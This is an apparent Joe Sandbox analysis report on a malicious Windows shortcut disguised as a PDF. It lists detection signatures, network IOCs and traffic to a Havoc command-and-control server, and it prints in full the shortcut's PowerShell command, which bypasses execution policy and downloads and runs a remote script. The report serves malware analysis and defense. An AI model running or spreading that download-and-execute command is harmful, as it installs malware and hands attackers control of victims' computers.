Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk

Overview

General Information

Sample name:Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
Analysis ID:1578249
MD5:1fdc0eb15af0f989e5cc7ab9fc8e14ec
SHA1:b15076953f50268ca6e5cc57f3279a3652da5311
SHA256:623767715bd1a33c41e2de8ab3af341e629105132c3434f454cf249f98adbfd7
Tags:lnkScamTransaction7350user-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Bypasses PowerShell execution policy
Machine Learning detection for sample
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7736 cmdline: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Onedrive.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Local\Temp\Onedrive.exe" MD5: 32C31F06E0B68F349F68AFDD08E45F3D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ProcessId: 7736, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ProcessId: 7676, ProcessName: cmd.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}", ProcessId: 7736, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T13:35:19.388292+010020565391Malware Command and Control Activity Detected192.168.2.44973547.84.196.148443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T13:35:09.604537+010028032742Potentially Bad Traffic192.168.2.44973289.35.237.17080TCP
2024-12-19T13:35:11.835744+010028032742Potentially Bad Traffic192.168.2.44973389.35.237.170443TCP
2024-12-19T13:35:12.823279+010028032742Potentially Bad Traffic192.168.2.44973289.35.237.17080TCP
2024-12-19T13:35:15.071412+010028032742Potentially Bad Traffic192.168.2.44973489.35.237.170443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkVirustotal: Detection: 14%Perma Link
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknownHTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp, sppc.dll.2.dr
Source: Binary string: phoneactivate.pdbGCTLG source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: phoneactivate.pdb source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: Binary string: phoneactivate.pdbGCTL source: Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 4_2_00007FFDF3AF7470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,4_2_00007FFDF3AF7470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2056539 - Severity 1 - ET MALWARE Havoc Demon CnC Request : 192.168.2.4:49735 -> 47.84.196.148:443
Source: Joe Sandbox ViewIP Address: 89.35.237.170 89.35.237.170
Source: Joe Sandbox ViewASN Name: TEENTELECOMRO TEENTELECOMRO
Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 89.35.237.170:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 89.35.237.170:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 89.35.237.170:443
Source: global trafficHTTP traffic detected: GET /g1.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 279Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global trafficHTTP traffic detected: GET /g1.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknownTCP traffic detected without corresponding DNS query: 47.84.196.148
Source: global trafficHTTP traffic detected: GET /g1.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: GET /g1.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficHTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global trafficDNS traffic detected: DNS query: bangla.b-cdn.net
Source: unknownHTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 279Host: 47.84.196.148
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net/g1.ps1
Source: powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000002.00000002.1851578383.0000025E90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Onedrive.exeString found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2871361393.000001729C172000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873861146.000001729C175000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2872607914.000001729C172000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873770232.000001729C172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294391353.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2644040219.000001729C142000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2456893874.000001729C163000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3293582423.000001729C162000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142971553.000001729C164000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2643148332.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/
Source: Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/3Y
Source: Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/8
Source: Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/Z
Source: Onedrive.exe, 00000004.00000003.4047585231.000001729C153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reports
Source: Onedrive.exe, 00000004.00000003.3294581743.000001729C154000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294309723.000001729C153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reports3
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901159878.000001729C12E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reportsC
Source: Onedrive.exe, 00000004.00000003.2873197147.000001729C154000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2871361393.000001729C152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reportsG
Source: Onedrive.exe, 00000004.00000003.3744954721.000001729C161000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C153000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2456893874.000001729C163000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3745161112.000001729C14A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2643148332.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3900915820.000001729C14A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294813782.000001729C12E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/reportsr
Source: Onedrive.exe, 00000004.00000003.2872607914.000001729C167000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2872000136.000001729C167000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873770232.000001729C167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148/xC
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901159878.000001729C12E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901025461.000001729C0DC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873981465.000001729C0DC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C0A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148:443/reports
Source: Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.84.196.148:443/reports-
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net
Source: powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net/g1.ps1
Source: powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000002.00000002.1836408156.0000025E81602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E81A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1836408156.0000025E80C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1851578383.0000025E90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
